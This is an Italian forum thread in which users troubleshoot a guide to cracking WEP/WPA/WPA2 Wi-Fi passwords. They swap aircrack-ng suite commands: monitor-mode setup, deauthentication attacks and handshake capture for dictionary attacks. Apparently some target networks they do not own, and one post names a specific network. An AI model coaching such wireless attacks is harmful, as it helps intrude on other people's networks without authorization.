• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Sganja secondo il mio modesto parere.... potrebbe essere che il router in causa abbia il mac filter attivato, quindi non si autentica in rete come tale.......
e c'è quindi una soluzione?......o devo ricercare come disattivare il mac filter?
--------------- AGGIUNTA AL POST ---------------
che poi...si. Credo si possa fare dall'impostazioni del router, ma per fare questo devo comunque esse connesso altrimenti non posso accedere alla pagina delle impostazioni.......sempre se non sbaglio.....
 
Ultima modifica:
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Per far apparire l'hanshakes bisogna che almeno un client sia collegato alla rete?
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Per far apparire l'hanshakes bisogna che almeno un client sia collegato alla rete?

Sì certo altrimenti lo scambio di pacchetti non può avvenire se nessun client è connesso.
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

non riesco ad andare oltre: airodump-ng -c 1 -w wpa mon0 . Mi esce root@Ubuntu:~# airodump-ng -c 1 -w wpa mon0
Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device

sono riuscito ad andare avanti ora: aireplay-ng -0 20 -a 00:1E:2A:22:emoji_smiley:F:9C mon0
root@Ubuntu:~# aireplay-ng -0 20 -a 00:13:92:21:37:A8 mon0
17:30:09 Waiting for beacon frame (BSSID: 00:13:92:21:37:A8) on channel -1
17:30:09 mon0 is on channel -1, but the AP uses channel 1
 
Ultima modifica:
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

La tua interfaccia di rete non è mon0, metti quella giusta e risolverai il problema.
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

ho risolto il problema dell'interfaccia ma adesso mi dice:
19:21:19 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel -1
19:21:29 No such BSSID available.
Please specify an ESSID (-e).
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Non hai specificato l'argomento ESSID, leggi bene la guida.
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

seguo la guida passo dopo passo ma casco sempre la, non sarà mica un problema di ubuntu 11.10?
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

seguo la guida passo dopo passo ma casco sempre la, non sarà mica un problema di ubuntu 11.10?

Anche ad altri ha dato problemi con Ubuntu 11.10, prova con la versione 10.10 ( come leggi dal titolo questa guida è stata scritta utilizzando Ubuntu 10.04LTS )
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

La tua interfaccia di rete non è mon0, metti quella giusta e risolverai il problema.
giusto....o prova a stoppare prima tutte le interfacce e a rifare tutto
airmon-ng stop wlan0-mon0-mon1.....
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Posso chiederti se sbaglio qualcosa io oppure ti sei dimentica qualcosa in questo comando?

aireplay-ng -0 20 -a 00:1E:2A:22: DF:9C mon0

se lo scrivo in questo modo mi dice di specificare la replay action.

Dopo vari tentativi sono riuscito a fargli fare una cosa di questo tipo:
aireplay-ng -0 20 -a 00:1E:2A:22: DF:9C -e (ESSID) mon0

dove in ESSID ovviamente va inserito il nome della connessione da craccare.
Sbaglio qualcosa ?

Inoltre sembra che le mie interfacce da mon0 a mon4 vadano bene tutte.
Sbaglio a leggere il terminale o può essere possibile che posso usare tutte quelle interfacce?

Sò che faccio tante domande ma è poco che uso linux e non conosco molto bene quello che mi dice il terminale.
Grazie a quanti vorranno aiutarmi
 
Ultima modifica:
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Posso chiederti se sbaglio qualcosa io oppure ti sei dimentica qualcosa in questo comando?

aireplay-ng -0 20 -a 00:1E:2A:22: DF:9C mon0

se lo scrivo in questo modo mi dice di specificare la replay action.

Dopo vari tentativi sono riuscito a fargli fare una cosa di questo tipo:
aireplay-ng -0 20 -a 00:1E:2A:22: DF:9C -e (ESSID) mon0

dove in ESSID ovviamente va inserito il nome della connessione da craccare.
Sbaglio qualcosa ?

Che distro stai usando ?
NB: Posta screen dell'output del terminale quando digiti quel comando

Inoltre sembra che le mie interfacce da mon0 a mon4 vadano bene tutte.
Sbaglio a leggere il terminale o può essere possibile che posso usare tutte quelle interfacce?

Sò che faccio tante domande ma è poco che uso linux e non conosco molto bene quello che mi dice il terminale.

Posta l'output del terminale dopo aver dato il comando che identifica la tua interfaccia.
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

La distro è Ubuntu 10.04 LTS.

Questo è quello che appare dopo il comando

rita@Rita-pc:~$ sudo airmon-ng start wlan0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
858 NetworkManager
863 avahi-daemon
864 avahi-daemon
923 wpa_supplicant
27481 dhclient
Process with PID 27481 (dhclient) is running on interface wlan0
Process with PID 4061 (airodump-ng) is running on interface mon0


Interface Chipset Driver

wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon7)
mon1 Intel 4965/5xxx iwlagn - [phy0]
mon2 Intel 4965/5xxx iwlagn - [phy0]
mon3 Intel 4965/5xxx iwlagn - [phy0]
mon4 Intel 4965/5xxx iwlagn - [phy0]
mon5 Intel 4965/5xxx iwlagn - [phy0]
mon6 Intel 4965/5xxx iwlagn - [phy0]
mon0 Intel 4965/5xxx iwlagn - [phy0]


Però alla fine di tutta la procedura anche se lo sniffer completa il decloak al momento di craccare mi dice che non ha rilevato nessun pacchetto wep o wpa.

Il problema grosso è che la connessione che dovrei craccare è protetta da wpa2.
 
Ultima modifica:
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

La distro è Ubuntu 10.04 LTS.

Questo è quello che appare dopo il comando

rita@Rita-pc:~$ sudo airmon-ng start wlan0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
858 NetworkManager
863 avahi-daemon
864 avahi-daemon
923 wpa_supplicant
27481 dhclient
Process with PID 27481 (dhclient) is running on interface wlan0
Process with PID 4061 (airodump-ng) is running on interface mon0


Interface Chipset Driver

wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon7)
mon1 Intel 4965/5xxx iwlagn - [phy0]
mon2 Intel 4965/5xxx iwlagn - [phy0]
mon3 Intel 4965/5xxx iwlagn - [phy0]
mon4 Intel 4965/5xxx iwlagn - [phy0]
mon5 Intel 4965/5xxx iwlagn - [phy0]
mon6 Intel 4965/5xxx iwlagn - [phy0]
mon0 Intel 4965/5xxx iwlagn - [phy0]

Ottimo, puoi usare da mon0 a mon7.

Però alla fine di tutta la procedura anche se lo sniffer completa il decloak al momento di craccare mi dice che non ha rilevato nessun pacchetto wep o wpa.
Il problema grosso è che la connessione che dovrei craccare è protetta da wpa2.

Eh...in rete non ho trovato dei dizionari WPA2 per aircrack-ng, questo è il problema. Come puoi ben leggere nella guida ho trovato solo un dizionario WPA ( potresti comunque provare, così tanto per ).
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Si però a parte il dizionario non va bene nemmeno la procedura??

Siccome nel decloak mi dice che non trova pacchetti wpa.....per il wpa2 bisogna cambiare qualcosa?
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Si però a parte il dizionario non va bene nemmeno la procedura??

Siccome nel decloak mi dice che non trova pacchetti wpa.....per il wpa2 bisogna cambiare qualcosa?

La procedura va bene, il fatto è che se vuoi crackare una rete che ha una protezione di tipo WPA2 devi avere un buon dizionario e cambiare l'argomento "wep" in "wpa2" del comando airodump-ng -c 11 -w wep mon0
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

@System32
Ciao System32, ho saputo che per craccare una rete wpa, wpa-psk, occore avere un amplificatore wireless. Che sarebbero quelle piccole antennine.
Vorrei sapere cosa ne pensi.
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

L'amplificatore wireless serve per aumentare la potenza di ricezione del segnale ma non è uno strumento fondamentale per crackare una rete. Se dovessi avere una rete con un forte segnale ( perché magari è molto vicina ) non ti serve l'amplificatore.
 
Riferimento: Craccare reti WEP-WPA-WPA2 con Ubuntu 10.04 LTS ( attacco dizionario )

Innazitutto un ringraziamento in particolare a @System32 per il lavoro!;)

Ho un problema...seguendo i preziosi consigli presenti nella guida (primo post)...



Dopo aver atteso piu di 16min come da screenshot allegato (
Perfavore, Entra oppure Registrati per vedere i Link!
) , e aver scaricato piu di 170.000 pacchetti....non ho ricevuto nessun Decloak (dovrebbe comparirmi sempre sulla schermata dello screenshot vero?!), per poter continuare.... qualcuno mi puo dire di cosa potrebbe trattarsi ?

P.S.

Preciso che ho Ubuntu 10.04 LTS.

La mia linea è FASTWEB-1-38229DFA8854 con canale 13 e protezione WPA


Grazie!
 
Ultima modifica: